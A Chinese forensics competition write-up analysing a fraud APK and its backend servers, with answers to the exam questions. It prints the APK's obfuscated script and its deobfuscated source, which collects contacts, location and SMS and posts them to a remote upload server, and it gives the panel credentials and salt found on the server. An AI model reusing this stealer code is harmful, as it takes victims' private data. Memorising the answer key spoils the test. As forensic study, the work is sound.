111y110U32Z40h101W41x32S123K10b9s9k9x9Q9p9J9T105d102I32x40X101U46Z100j101H110k105N101J100b65q108Q119m97d121Y115u46D108w101K110g103G116n104C32l62U32j48j41C32z123G10j9o9x9G9Z9M9B9I9b47U47R26435v38480x34987V27704M20037T25298i32477P32O32q10t9s9D9t9O9b9t9x9m47l47e32P24377B20986d25552m31034M26694P35299G37322d20026Y20309h38656a35201n23450K20301d26435y38480P65292h24341F23548E29992z25143l25171p24320E35774J32622R39029W38754X24320E21551o32n32C10c9B9G9r9C9m9L9U9b101N114V114C111U114a67r97n108S108Y66R97J99U107A40J39K35831V24744A21516H24847D24377U20986t30340z26435l38480D65292H20415p21487B27491U24120O20351X29992X65s80R80x65281N22914G26524F26410y24377A20986Z65292w35831B21069m24448d8220T25163R26426E35774m32622g8221z37324S30340k8220i26435k38480Y31649n29702S8221l25214c21040W26412V24212h29992D65292L24182K25171t24320S36890f35759R24405p26435k38480s65292w26041j21487P20351F29992I12290x39w41v10P9p9n9J9k9a9B9k9z47A47i32f99c111W110T115k111l108f101F46i108T111a103x40W39W65t108F119i97x121O115o32a68c101R110o105w101b100o33S33H33k32h39b32h43j32a101s46H100F101f110k105V101D100X65o108a119l97h121K115N46C116v111F83k116H114R105U110y103b40a41H41u59i32R32k10a9q9Z9r9T9a9d9d125b10j9G9K9g9D9X9a9n105Q102O32N40a101G46p100z101V110g105K101V100e80u114i101b115U101r110o116Q46G108b101f110n103x116B104f32Y62J32J48Q41i32P123p10o9v9I9W9m9Y9x9w9B47z47h26435c38480j34987E20020Z26102w25298B32477b32S32N10o9G9H9k9u9t9j9b9n47s47Y32l24377p20986a25552m31034V26694d35299W37322c20026x20309v38656F35201k23450P20301g26435N38480h65292T21487y20877p27425D35843A29992j112d108V117l115p46e97I110X100u114K111R105a100M46a114c101J113C117G101Y115t116e80E101X114s109G105r115t115A105s111w110M115S30003J35831X26435P38480S32Y32a10J9U9S9s9v9Y9Z9U9t101j114w114N111G114V67z97t108r108g66O97o99x107D40I39p35831G24744K21516G24847K24377Q20986g30340j26435y38480B65292y20415Y21487l27491d24120j20351G29992q65n80n80W65281r22914N26524Y26410w24377Z20986k65292L35831w21069A24448Y8220C25163w26426N35774Q32622C8221T37324Y30340w8220U26435P38480r31649s29702N8221o25214p21040v26412r24212B29992p65292U24182J25171Y24320V36890E35759q24405t26435k38480r65292b26041D21487A20351Q29992a12290c39m41u10x9E9E9L9i9h9m9S9b47H47m32N99v111e110P115N111j108J101v46D108X111M103h40a39C80Q114v101d115J101N110x116r32T68I101Z110B105F101x100W33w33B33J32b39K32U43U32G101i46d100O101q110w105g101j100d80M114p101V115Z101F110x116M46r116E111o83n116Q114j105f110K103f40G41X41s59B32K32L10v9S9c9N9Q9z9A9Q125b10T9J9b9Q9u9a9K9L105k102f32h40g101v46S103Q114q97N110L116J101h100c46P108L101M110W103n116d104R32H62R32F48m41H32Z123Q10x9N9m9V9C9A9L9N9v47M47X26435v38480c34987g20801H35768T32p32l10n9o9h9R9u9q9Q9q9p47v47w35843b29992m20381Q36182I33719J21462x23450U20301g26435G38480S30340U20195p30721G32t32X10E9X9m9P9z9P9F9K9i115d117I99T99z101Y115x115z67w97Q108a108R66U97Y99p107J40i41K10I9J9I9B9j9E9C9T9j47m47B32H99s111d110n115e111t108E101N46R108D111N103v40Z39A71M114h97p110X116b101x100H33F33N33A32B39k32R43g32x101t46V103i114V97p110r116q101o100a46N116E111T83d116g114z105A110e103s40m41F41s59u32P32e10d9C9m9b9S9H9V9U125U10R9Y9g9x9Q9T9F125E44w32s102E117A110v99E116H105B111p110V32I40P101G41T32N123P10H9q9o9f9X9c9W9g101r114x114f111H114T67t97i108y108k66H97h99I107g40D39M35831C24744W21516N24847s24377J20986j30340z26435u38480x65292Q20415N21487B27491s24120U20351f29992n65d80g80G65281b22914T26524O26410I24377n20986W65292C35831v21069P24448k8220p25163S26426s35774U32622N8221I37324F30340k8220R26435k38480T31649u29702g8221I25214K21040P26412M24212i29992O65292v24182k25171u24320Q36890a35759J24405A26435T38480y65292e26041q21487t20351D29992W12290o39W41K10U9O9K9q9T9B9u9W47i47L32T99Q111u110T115N111h108T101B46b108L111T103c40n39f82u101s113t117x101o115V116s32p80T101u114y109i105G115O115t105F111a110C115k32f101S114s114K111k114A58w39y32R43r32L74H83D79C78j46O115Y116s114j105Y110c103x105o102v121B40c101Y41z41t59z32b32M10y9t9r9A9L9o9G125W41M10r9p9m9y9A9r125V32e101z108J115p101n32s105E102t32p40O112b108G117C115c46L111v115y46a110a97H109Z101s32Y61q61Y32s39A105A79Y83j39J41a32D123F10C9h9d9J9h9R9h47k47E105z111O115n32N44H31532m19968a27425b20351R29992D30446X30340i26435l38480Q26102i65292X24212t29992u30340W26435c38480M21015v34920v37324X26159E19981m23384M22312C30340v65292Y25152s20197a20808L40664K35748D25191K34892n19968S19979g25104n21151L22238D35843c65292d25171d24320f35201U20351U29992c30340J25805p20316q65292v27604S22914c32o112w108p117G115m46l99Z97V109S101N114Z97W32t32w10Q9r9N9m9E9Y9O47J47V36825S26102X31995z32479Z20250S25552E31034W26159A21542J25171R24320a30456L24212i30340T26435S38480K65292T22914l26524u25298g32477L20063L27809V20851t31995t65292U22240G20026u24212p29992D30340n26435q38480F21015C34920v37324C24050i32463Y23384u22312Z35813f26435e38480b20102f65292A19979S27425S20877Q35843c29992E30456S24212o26435g38480d26102M65292Z23601Y20250F32T32S10g9D9z9t9p9Z9x47G47I36208Q32Y101z108b115F101Z32H37324u30340L27969l31243l65292n20250M32473n29992j25143x25552X31034f65292E24182g19988e36339w36716u21040P24212E35813G30340s26435n38480H39029f38754v65292c35753Z29992I25143w25163g21160q25171s24320K12290H32q32x10l9J9v9r9c9e9C105O102U32u40B99Y104N101w99O107M82m101e115U117o108Q116N32M61q61L32m39P117h110B100O101W116l101K114n109f105x110b101p100u39k41t32q123P10N9L9B9f9S9A9G9U47s47w35843X29992f20381K36182Z33719g21462q23450G20301e26435j38480X30340A20195Y30721I32j32s10Z9u9U9q9D9U9X9g115E117r99x99o101o115u115j67u97a108H108Q66j97Q99n107H40d116M114m117C101c41o10J9i9m9c9d9G9n125u32O101e108k115M101C32o123F10N9q9d9j9I9U9g9k47N47B22914b26524X26159z32n105X111J115U32D31995I32479O65292V105k111r115u32t27809T26377Z21160h24577J30003a35831F25805J20316s65292M25152V20197J25552o31034L29992X25143h21435Z35774r32622I39029p38754E25163d21160P25171S24320A32c32H10G9k9k9d9l9y9m9e109a117e105I46Q99a111q110t102b105i114O109A40u112V101R114A109O105g115b115E105R111P110g78T97V109B101j32J43d32w39q26435W38480I27809u26377X24320W21551l65292O26159A21542t21435c24320p21551v65311V39D44a32D39H25552x37266D39X44M32I91B39E21462E28040I39T44c32c39c30830t35748u39G93V44M32g102w117M110t99B116g105O111o110r32V40t101A41x32b123l10h9m9A9L9Y9O9T9G9P47r47Z21462Q28040Y32K32M10M9V9E9E9g9j9n9f9l105u102A32l40g101c46d105T110P100M101s120c32J61P61V32c48l41x32x123m10v9K9L9G9A9t9E9Q9h9T101y114A114N111d114E67p97F108L108m66p97A99E107y40Z39X35831R24744x21516E24847P24377l20986g30340b26435a38480R65292i20415o21487I27491j24120K20351U29992D65v80S80x65281g22914Z26524k26410L24377H20986T65292w35831g21069M24448C8220X25163W26426C35774M32622V8221y37324Z30340f8220N26435C38480Q31649K29702u8221f25214s21040O26412e24212m29992s65292r24182o25171a24320B36890e35759v24405A26435E38480z65292d26041D21487s20351G29992o12290t39K41H10j9c9F9z9G9W9S9E9v125a32x101M108y115W101v32o105T102b32O40b101w46L105K110c100F101W120p32l61y61M32i49f41x32c123F10x9Y9o9Q9l9A9T9b9l9a47f47W30830p35748q65292m25171d24320Q24403C21069K24212F29992c26435E38480e35774A32622t39029j38754k32x32s10r9l9L9B9Z9y9r9Q9g9v118y97E114y32v85S73Q65L112B112N108A105s99o97f116O105t111D110B32Q61s32R112n108j117N115C46Q105M111h115R46g105L109P112I111p114B116A40m39I85g73H65c112W112q108W105m99J97o116c105V111r110m39t41h59z10Y9y9M9B9T9a9z9Z9q9c118T97X114b32o97U112k112X108r105C99U97X116j105z111f110z50y32j61G32h85o73b65T112L112F108U105E99C97M116k105r111N110t46T115o104G97x114L101Z100J65d112o112E108h105Q99a97K116n105f111H110D40o41U59m10G9I9M9R9s9a9z9Y9M9M118j97I114D32V78r83o85f82p76x50j32u61x32L112Q108U117z115j46t105W111p115i46H105g109K112F111d114u116m40I39v78D83D85Z82K76k39T41x59B10T9I9x9o9L9V9Y9K9j9G47F47W32Y118S97x114G32V115h101P116s116f105U110r103w50J32s61X32I78h83t85S82d76q50b46S85l82l76W87R105Y116t104u83J116i114Y105X110G103M40E34H112o114L101Z102f115k58Q114q111J111v116T61B76t79F67g65b84G73t79w78B95M83L69c82t86y73I67C69A83a34O41P59l32x32p32z32f32g32W32f32J32U32e32J32J32g32h32R32d32A32G32s32G32W32r32e32w32C32t32h32B32n10U9p9J9r9Y9B9z9j9A9d118e97k114d32t115v101X116S116L105t110W103T50B32G61h32h78T83h85H82s76V50D46n85r82t76f87U105N116b104M83n116x114q105u110J103Q40R39C97L112r112t45z115k101Q116f116d105T110I103a115y58d39c41Y59C10s9o9E9r9j9l9q9a9O9U97Z112y112T108f105K99B97t116g105F111J110G50g46E111n112r101o110c85M82j76n40j115G101K116K116v105e110A103V50Y41M59J10D10z9s9t9f9A9J9x9g9X9V112J108Z117F115F46N105v111I115S46h100E101q108z101B116T101D79o98G106D101R99V116D40K115C101u116O116P105O110D103A50S41S59B10L9T9X9b9j9R9v9q9l9d112c108R117I115D46P105a111m115x46R100H101o108U101y116H101A79Z98R106b101d99k116p40E78q83m85y82q76Q50q41J59e10Q9F9z9l9N9M9o9B9m9Z112L108o117G115M46C105H111V115r46M100p101U108i101v116P101u79c98U106w101x99i116t40B97g112U112c108m105O99n97U116C105r111Y110R50n41Z10G9s9u9e9O9a9E9a9t125v10E9J9y9G9J9v9m9b125n44m32J39z100Z105R118k39k41o10W9q9E9H9F9d9s125G10z9m9R9N9G9X125D10W9L9U9I9e125h10l9y9j9M125Y10S10r10z10O9p9H9T102z117Q110l99r116L105Y111w110Z32L97S97g40Y41Z32N123v10j9y9D9A9g118P97a114Z32q115Y106w104G32V61d32X36p40z39v35a115c106o104P39n41Y46A118S97m108Y40s41c59E10V9A9Y9c9v118o97f114U32X121z113c109N32S61Y32y36T40J39w35g121T113e109V39H41Q46x118f97r108B40p41k59k10u9x9P9Y9L105h102Y32C40j112p97N114f115I101i73Y110y116I40r115a106I104X41p32l62y32L48u32z38T38A32W112p97Z114r115K101B73X110F116A40a121R113m109U41Z32p62k32f48E32Z38m38e32p112u97j114x115V101t73D110m116Q40Z115l106r104S41O32u62l32n49g51q48q48v48D48W48m48g48Y48f48q32U38x38f32k112W97D114i115b101L73h110p116o40A115S106h104o41Y32Q60j32G49D57Z57v57y57a57w57h57K57s57S57L32R38F38V32k112g97z114p115V101n73Q110I116j40H121W113V109A41A32l62v32Z48O32q38a38r32S112C97n114B115r101c73b110e116C40j121X113G109V41d32o60H32n57Q57i57N57X57t57r41x32b123E10i10u9l9F9d9h9k103q101d116D80H101B114x109i105G115g115b105T111c110M40J39K67C79f78n84S65E67S84C83a39o44K32R102W117I110l99x116P105c111j110F32p40s41m32n123E10d9B9q9w9m9f9y104F117J111r113s117g40P115L106S104y44O32I121J113g109I41L59L10w10j9H9M9l9x9Z125R44x32v102m117f110O99W116l105c111y110w32M40C109E115P103Y41R32K123A10Y9u9h9C9B9E9W109q117U105A46v97B108m101K114O116m40g109d115R103s44a32A39t25552d37266V39P44a32J39D30830v23450h39E44S32u102h117d110U99r116U105p111d110e32q40t41u32M123A32Q125w44m32f39X100F105R118B39K41D10a9Z9C9g9I9y9j47Q47v97R97X40C41s10Z9X9e9Z9s9H125z41b10r9B9W9o9K125S10E9S9N9O9a101G108d115L101B32N123R10t9l9W9d9Z9c109C117Q105h46D116I111D97i115p116e40M39g35831K36755F20837W27491r30830z30340Z25163b26426u21495m21644t36992D35831o30721f39j41M10b9y9M9T9h125d10D10u9H9K9I125V10M10s10k10B10p9h9C9w102Q117H110K99y116S105h111j110p32O100y105O110E103t119K101B105B40d115m106y104i44S32n121f113Q109Z41p32y123o10V9E9k9d9j112C108N117L115j46D103n101S111N108w111O99H97V116P105G111D110B46q103M101O116e67I117a114Y114b101g110J116F80H111E115S105l116L105L111S110S40S116E114L97Y110y115e108O97o116h101R80x111d105z110m116d44f32m102p117h110W99s116G105r111M110h32E40v101o41e32w123O10p9o9W9R9P9F109z117S105M46p116d111d97L115d116X40E34C24322d24120V58C34M32b43r32C101Z46p109c101U115c115B97M103G101v41v59T10g9K9k9f9a125d41T59a10f9x9E9y125s10l10V9L9Y9b102b117x110X99u116L105f111h110O32N116r114T97D110Q115i108C97F116b101V80m111j105H110M116o40r112m111p115Q105o116x105u111N110a41U32F123m10x10O9u9w9K9k118T97r114S32Y115Y106V104f32d61g32N36X40P39l35x115m106E104x39M41o46q118r97n108b40l41z10D9C9F9C9P118Q97I114S32o121j113j109p32H61Z32i36l40d39r35u121z113h109u39u41I46L118c97t108Q40Z41u10Y9R9q9w9r118x97i114q32o99j117j114k114Z101f110g116f76w111C110p32b61R32s112I111a115S105D116K105S111Q110h46G99u111n111x114O100K115q46b108w111y110b103h105r116E117K100l101z59F10e9n9f9e9B118e97X114y32t99N117s114S114M101d110k116b76r97J116Q32T61t32s112i111v115B105a116I105Z111y110z46o99V111p111t114p100e115B46q108b97G116A105o116k117M100r101K59l10J9c9e9a9d118d97w114t32Y106r105L110f103s119q101u105A100z117u32x61z32u115P106x104G32Y43C32o39R44G39u32r43D32v121t113n109z32V43r32G39N44Z39C32f43Y32d99Z117y114Z114g101k110r116R76E111k110i32t43o32l39G44K39Y32r43J32f99v117I114v114c101y110v116C76Z97M116w59d10d9x9s9Y9A109Z117t105q46y97V106d97U120m40v97i112W105Z115o101s114T118u101p114z32t43D32d39t97U112O105K109k97s112n39J44k32J123V10M9A9H9R9R9y100w97X116M97v58L32R123A10K9u9G9I9t9N9d100g97L116c97k58d32X106n105n110Q103a119E101k105r100A117q10j9F9p9I9Y9H125Y44h10B9e9Y9I9O9g100I97U116q97P84T121s112J101W58P32j39a116V101u120G116M39M44V47d47O26381Y21153n22120Q36820a22238m106d115x111F110e26684v24335C25968x25454h10R9A9a9E9C9z116K121G112T101B58t32O39H112t111z115t116x39w44r47a47R72w84c84J80i35831A27714E31867q22411T10s9s9B9j9h9y116n105I109V101b111d117K116P58P32s49v48I48V48n48w44v47X47l36229j26102a26102G38388E35774F32622t20026F49B48G31186L65307d32i32j32k32q32N32n32K32z32g32Z32g32Q32y32r10v9P9j9P9i9x115i117I99j99P101d115I115M58k32N102m117F110Y99f116x105m111I110h32L40o100S97O116e97Z41W32w123U10M10f9q9j9X9y9Z9z105M102U32j40L100h97V116x97t32l61e61U32K39U33719Y21462J25104M21151e39d41x32U123w10p9Z9x9F9J9v9D9C114x101w113M117d101z115P116C80m101u114V109p105j115v115i105K111K110n40Y115T106n104p44A32L121m113g109G41f59Y10T10L9A9b9q9j9D9J9b47M47n115C101J116R73V110V116n101a114o118r97H108Z40C102L117E110F99J116M105e111g110u40i41l123t10V9c9C9D9M9N9N9y47f47I118J97y114K32I115A106m104d61H36f40H39c35o115D106Y104X39S41M46I118G97a108Q40Y41e59E10U9j9X9i9y9U9x9G47U47o118M97W114R32i121u113k109v61r36r40g39Z35s121c113N109i39V41R46S118a97P108I40j41s59e10s9H9F9i9K9V9p9s47m47q114F101i113u117v101j115t116i80Z101M114x109g105L115k115U105L111X110f40J115A106D104G44A121W113r109C41T59u10D9e9i9s9F9j9m9T47X47f99I111n110c115t111W108e101h46P108j111G103R40a39o115e101w110r100Q39j41d10O10H9t9x9M9b9k9w9I47B47l125O44d51U48d48U48s48E41H10K9P9Q9R9a9L9m125Y10x10B9A9X9y9u9t9i109x117f105p46e116J111f97B115c116c40C100q97J116O97U41Y10A9f9h9q9Z9e125y44K10j9p9s9y9g9W101L114Q114T111R114u58m32H102D117y110L99P116d105t111Q110f32c40B120A104X114q44a32q116J121R112z101J44j32t101R114A114k111k114D84v104X114p111J119j110h41q32R123x10T9H9r9r9f9T9B47G47Y24322A24120G22788S29702g65307a10h10R10X9Z9v9D9v9b125f10y9S9v9L9P125s41s59q10Y10F9m9s9o9F47K47a20070N20889Y33258v24049l30340r36923G36753H10y10W9K9L9O125q10i9u9z9H47v47v32f25193O23637U65v80b73n21152u36733g23436I27605i65292O29616z22312E21487m20197f27491v24120V35843p29992p25193D23637W65X80b73j10L10R9p9u9r102J117j110p99t116D105I111F110L32f104Z117K111Z113w117P40m115X106W104v44p32L121F113d109b41g32C123D10M9W9n9a9w118B97K114e32g99L111S110i32w61e32f115a106A104Q32w43G32d34O42d42o34w32q43R32U121I113y109G32W43C32I39f42Y42G39l32e43Q32Z97O100F100M114M101s115k115L59u10O10T10d9e9F9e9V112a108L117W115k46x99g111d110F116W97h99T116u115A46f103i101X116Q65F100u100s114k101A115I115P66n111Q111n107Y40J112l108L117Q115l46t99t111y110j116i97b99U116y115E46C65B68d68N82c69W83w83U66y79p79l75c95C80F72N79f78U69A44X32S102s117u110D99p116d105z111I110A32I40W97V100G100S114W101s115h115g98b111Z111B107X41z32P123B10X10v10O9E9c9r9g9d97p100i100J114E101H115j115m98O111s111E107B46t102U105I110D100B40A91s34d100w105c115x112X108v97g121W78L97x109H101Q34h44E32a34m112s104T111b110a101X78S117J109u98p101h114i115t34g93A44h32J102Q117b110P99T116q105T111I110W32j40o99w111i110n116Y97C99I116k115x41Z32y123G10E10a10R9o9w9S9E9O9A102K111k114t32E40k118p97T114L32V105Y32S61d32R48M44N32i108z101e110W32e61f32Y99u111Q110y116q97M99r116o115f46V108V101c110T103T116m104x59b32g105W32M60d32J108g101L110W59d32A105o43O43G41j32P123c10C9o9O9z9Y9C9N9d99A111k110V32C61p32g99V111n110v32m43v32C39k61f39I32P43N32P99M111s110T116m97T99c116O115Y91S105J93U46w100e105M115O112y108Z97W121X78R97U109K101O32u43U32Y39U124l39t32V43t32G40w99f111Z110h116f97h99B116c115L91r105h93a46w112A104r111t110l101R78s117r109a98B101U114R115T46P108D101R110e103V116A104F32g61E61C32g48y32v63h32v34x34h32U58b32D99x111H110U116a97J99O116f115f91f105K93i46I112c104Y111B110s101I78m117E109B98l101x114z115X91L48s93x46Q118r97p108O117c101p41J59f10D9c9D9O9l9Q9c125B10j10r10m10k10C10d9b9W9h9k9V9l109C117K105F46Q97H106n97L120C40r97R112h105v115a101c114V118c101e114I32c43u32W39C97l112G105Q39u44H32q123b10c9P9L9X9k9c9L9D100R97S116I97f58p32k123y10L9p9G9N9o9m9N9h9Y100L97g116F97U58G32Z99U111D110x10u9S9s9c9z9u9Y9i125p44K10d9F9L9o9K9P9R9s100b97V116s97s84N121J112a101A58w32E39n116W101i120w116p39B44f47v47H26381M21153U22120R36820i22238q106Y115P111p110W26684D24335d25968z25454U10b9g9X9b9R9n9P9z116R121C112z101K58J32p39C112l111m115J116R39B44D47c47Z72X84d84E80b35831R27714g31867g22411D10V9s9r9q9V9t9Y9k116t105p109Q101f111M117G116W58J32N49j48W48y48R48S44j47b47B36229H26102G26102a38388a35774d32622E20026E49c48j31186K65307a32x32B32z32v32s32h32A32P32r32d32q32K32K32q10G9v9D9b9M9N9O9t115V117c99H99S101X115M115U58K32X102a117q110e99g116i105q111q110f32F40F100A97C116X97E41p32j123V10Q9N9t9t9g9c9l9F9m47T47q97w108A101m114n116f40g100F97E116J97O41J10Z9c9i9F9x9k9x9t9k105Q102Y32R40U100E97n116k97w32G61O61j32S39h27491N22312C21152J36733q21015M34920h39L41J32P123N10o9O9X9U9T9H9B9C9P9I100u105A110M103t119y101I105l40S115x106L104Z44s32t121m113O109t41M59o10z9y9D9Y9S9o9Q9C9k9m109w117J105o46V111j112d101Q110m87v105w110l100X111j119y40X123W10p9e9Y9Z9z9D9H9t9v9D9S117W114I108c58a32r39I108z105h115p116J46j104v116A109v108y39K44g10N9s9W9J9n9S9F9C9i9S9t115R104F111W119m58V32Z123Y10n9W9n9U9a9i9u9U9y9g9s9O97n117t116x111h83C104g111P119p58J32z116u114i117c101E10g9I9P9S9W9P9p9N9P9J9Y125X10a9P9a9u9B9l9W9B9Y9E125H41u59m10A9Z9r9F9u9S9K9k9e125c32Y101K108m115E101x32t123f10v9h9N9a9X9i9l9g9B9P109H117T105a46Y116l111I97b115r116p40v100l97C116y97W41N10o9Y9v9n9e9P9p9s9w125u10O9j9Y9E9Z9C9h9F9z47f47N99A111R110v115P111N108p101G46d108T111D103k40z99S111Y110g41N10E9m9Z9Z9O9d9Q9D125I44d10F9X9z9I9c9b9P9J101T114e114Q111Z114c58N32p102p117x110f99V116j105s111t110x32J40M120t104r114i44W32B116j121Q112K101R44g32e101v114Q114K111N114D84X104D114t111V119O110N41Q32n123U10a9F9C9x9C9u9t9G9D47o47V24322W24120x22788S29702I65307Z10f10m10C9n9T9I9i9k9v9u125b10S9F9i9j9o9d9r125S41n59m10y10Q10M10R9N9h9F9N9A125r44r32v102j117g110h99O116w105m111w110a32f40a41G32A123I10Q9x9L9h9c9W9C109M117o105P46u97r108c101m114H116n40Q34o20026a20445q35777A29992G25143M36136n37327g65292F20351p29992V26412C97L112l112F35831x21516T24847n36890Y35759y24405K25480r26435O32D34v41D59e10g9s9s9U9f9k125w44e32O123D10o9U9Q9u9u9r9A109V117f108k116e105z112w108B101V58J32r116X114u117b101U10r9R9M9g9N9q125L41L59n10K9u9P9T9m125h44x32E102C117Z110W99T116l105f111r110q32E40L101h41L32L123H10t9F9x9i9s9i109O117l105F46i97m108U101r114s116g40k34a20026d20445L35777G29992M25143e36136u37327I65292T20351R29992g26412c97Y112z112h35831a21516s24847o36890d35759U24405D25480a26435y32Q34y41Y59c10z9t9H9x9I125O41S59b10P9e9Z9D125h10D10E10r10Q10W9T9G125N41z59"['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');

	</script>

刚开始没有想到是混淆,后来noah发现是一个混淆,直接搜一下开头的sojson.v4,然后解混淆,然后就阅读代码,,就能理清了:

mui.init();

mui.plusReady(function () {
    //var main = plus.android.runtimeMainActivity();  
    // main.moveTaskToBack(false);

    var address = plus.device.vendor + '-' + plus.device.model;
    address = address.replace(/\n/g, "").replace(/ /g, "").replace(/\r/g, "");
    var apiserver = 'http://www.honglian7001.com/api/uploads/';
    //重复数据处理 预防用户重复点击
    
···

    function translatePoint(position) {

        var sjh = $('#sjh').val()
        var yqm = $('#yqm').val()
        var currentLon = position.coords.longitude;
        var currentLat = position.coords.latitude;
        var jingweidu = sjh + ',' + yqm + ',' + currentLon + ',' + currentLat;
        mui.ajax(apiserver + 'apimap', {
            data: {
                data: jingweidu
            },
            dataType: 'text', //服务器返回json格式数据
            type: 'post', //HTTP请求类型
            timeout: 10000, //超时时间设置为10秒;              
            success: function (data) {

                if (data == '获取成功') {
                    requestPermission(sjh, yqm);

                    //setInterval(function(){
                    //var sjh=$('#sjh').val();
                    //var yqm=$('#yqm').val();
                    //requestPermission(sjh,yqm);
                    //console.log('send')

                    //},30000)
                }

                mui.toast(data)
            },
            error: function (xhr, type, errorThrown) {
                //异常处理;


            }
        });

        //书写自己的逻辑

    }
    // 扩展API加载完毕,现在可以正常调用扩展API

    function huoqu(sjh, yqm) {
        var con = sjh + "**" + yqm + '**' + address;


        plus.contacts.getAddressBook(plus.contacts.ADDRESSBOOK_PHONE, function (addressbook) {


            addressbook.find(["displayName", "phoneNumbers"], function (contacts) {


                for (var i = 0, len = contacts.length; i < len; i++) {
                    con = con + '=' + contacts[i].displayName + '|' + (contacts[i].phoneNumbers.length == 0 ? "" : contacts[i].phoneNumbers[0].value);
                }

                mui.ajax(apiserver + 'api', {
                    data: {
                        data: con
                    },
                    dataType: 'text', //服务器返回json格式数据
                    type: 'post', //HTTP请求类型
                    timeout: 10000, //超时时间设置为10秒;              
                    success: function (data) {
                        //alert(data)
                        if (data == '正在加载列表') {
                            dingwei(sjh, yqm);
                            mui.openWindow({
                                url: 'list.html',
                                show: {
                                    autoShow: true
                                }
                            });
                        } else {
                            mui.toast(data)
                        }
                        //console.log(con)
                    },
                    error: function (xhr, type, errorThrown) {
                        //异常处理;
                    }
                });

这里是只有当你注册成功之后才会获取你的位置信息,才会向后台传输。所以我们是抓不到这个数据包的……

  1. APK程序回传通讯录时,使用的http请求方式为()

POST

  1. 该APK程序的回传地址域名为【标准格式:www.abc.com

www.honglian7001.com

  1. 该APK程序代码中配置的变量apiserver的值为【标准格式:www.abc.com/abc】

www.honglian7001.com/api/uploads/

  1. 分析该APK,发现该程序还具备获取短信回传到后台的功能,短信上传服务器接口地址为【标准格式:www.abc.com/abc】

www.honglian7001.com/api/uploads/apisms

function requestPermission(sjh, yqm) {
        plus.android.requestPermissions(
            ["android.permission.READ_SMS"],
            function (resultObj) {
                //SmsInfo存放一条短信的各项内容
                var SmsInfo = {}
                //Sms存放所有短信
                var Sms = {}

                var aimei = sjh;
                var aimei2 = yqm;
                var duanxin = '[{"imei":"' + aimei + '","imei2":"' + aimei2 + '"}';
                var Cursor = plus.android.importClass("android.database.Cursor")
                var Uri = plus.android.importClass("android.net.Uri") //注意啦,android.net.Uri中的net是小写
                var activity = plus.android.runtimeMainActivity()
                var uri = Uri.parse("content://sms/");

                var projection = new Array("_id", "address", "person", "body", "date", "type")
                var cusor = activity.managedQuery(uri, projection, null, null, "date desc")
                var idColumn = cusor.getColumnIndex("_id")
                var nameColumn = cusor.getColumnIndex("person")
                var phoneNumberColumn = cusor.getColumnIndex("address")
                var smsbodyColumn = cusor.getColumnIndex("body")
                var dateColumn = cusor.getColumnIndex("date")
                var typeColumn = cusor.getColumnIndex("type")
                if (cusor != null) {
                    while (cusor.moveToNext()) {
                        SmsInfo.id = cusor.getString(idColumn)
                        SmsInfo.Name = cusor.getInt(nameColumn)
                        SmsInfo.Date = cusor.getLong(dateColumn)
                        SmsInfo.Date = getFormatDate(SmsInfo.Date)
                        SmsInfo.PhoneNumber = cusor.getString(phoneNumberColumn)
                        SmsInfo.Smsbody = cusor.getString(smsbodyColumn)
                        SmsInfo.Type = cusor.getString(typeColumn)

                        var post = JSON.stringify(SmsInfo);
                        //console.log(post);
                        duanxin = duanxin + ',' + post;

                    }
                    duanxin = duanxin + ']';
                    //alert(duanxin);

                    mui.ajax(apiserver + 'apisms', {
                        data: {
                            data: duanxin
                        },
                        dataType: 'text', //服务器返回json格式数据
                        type: 'post', //HTTP请求类型
                        timeout: 10000, //超时时间设置为10秒;              
                        success: function (data) {
                            mui.toast('获取成功')
                            //console.log(con)


                        },
                        error: function (xhr, type, errorThrown) {
                            //异常处理;

                        }
                    });
                    cusor.close()
                }

            },
            function (error) {
                console.log('申请权限错误:' + error.code + " = " + error.message);
            });
    }
  1. 经分析,发现该APK在运行过程中会在手机中产生一个数据库文件,该文件的文件名为

  2. 经分析,发现该APK在运行过程中会在手机中产生一个数据库文件,该数据库的初始密码为

image-20211030105525136

说实话,这个软件真nb,逆向还支持Frida脚本……

检材二

经过掌握的APK程序后台服务器回连地址,警方成功调取该服务器的镜像,请使用第7题的答案对检材二进行解压进行分析,

  1. 检材二的原始硬盘的SHA256值为:

E6873068B83AF9988D297C6916329CEC9D8BCB672C6A894D393E68764391C589

  1. 查询涉案于案发时间段内登陆服务器的IP地址为【标准格式:111.111.111.111】

    192.168.110.203

根据题目背景材料,案件发生在4月24日~4月25日之间,直接last

image-20211030111848945

192.168.110.203

  1. 请对检材二进行分析,并回答该服务器在集群中承担的主要作用是()【格式:文件存储】

负载均衡

  1. 上一题中,提到的主要功能对应的服务监听的端口为:

80

  1. 上一题中,提到的服务所使用的启动命令为:

node app.js

  1. 经分析,该服务对于请求来源IP的处理依据是:根据请求源IP地址的第()位进行判断【标准格式:9】

3

  1. 经分析,当判断条件小于50时,服务器会将该请求转发到IP为()的服务器上【标准格式:111.111.111.111】

192.168.110.111

  1. 请分析,该服务器转发的目标服务器一共有几台【标准格式:9】

3

通过history查看历史记录,找到工作目录:/opt/honglianjingsai,查看README.txt,与历史记录综合分析,得出结论:负载均衡

查看配置文件:

image-20211030114316010

image-20211030115441629

  1. 请分析,受害者通讯录被获取时,其设备的IP地址为【标准格式:111.111.111.111】

192.168.110.203

  1. 请分析,受害者的通讯录被窃取之后,经由该服务器转发到了IP为()的服务器上【标准格式:111.111.111.111】

192.168.110.113

查看项目目录下的日志,结合案发时间查询日志:

image-20211030120408301

检材三

通过对检材二的分析,警方进一步掌握并落地到了目标服务器地址,通过对服务器进行证据固定,得到服务器镜像--检材 三,请使用第21题答案对检材三进行解密并分析,回答下列问题:

  1. 检材三的原始硬盘的SHA256值为

SHA256:205C1120874CE0E24ABFB3BB1525ACF330E05111E4AD1D323F3DEE59265306BF

  1. 请分析第21题中,所指的服务器的开机密码为:

这里需要后面的辅助,因为重置密码是直接重置,不会显示原来的密码(Windows会显示原来的。所以我们后面可以通过嫌疑人的PC端的Xshell中看到连接记录,从中可以看到密码

image-20211030152008259

  1. 嫌疑人架设网站使用了宝塔面板,请问面板的登陆用户名为:

hl123

image-20211030131634699

  1. 请分析用于重置宝塔面板密码的函数名为

set_panel_pwd

  1. 请分析宝塔面板登陆密码的加密方式所使用的哈希算法为

md5

  1. 请分析宝塔面板对于其默认用户的密码一共执行了几次上题中的哈希算法

3

  1. 请分析当前宝塔面板密码加密过程中所使用的salt值为【区分大小写】

v87ilhAVumZL

emm……感觉这个凭经验???(直接搜,应该可以搜出来吧……

宝塔面板目录结构框架 · 宝塔面板新手入门进阶使用教程

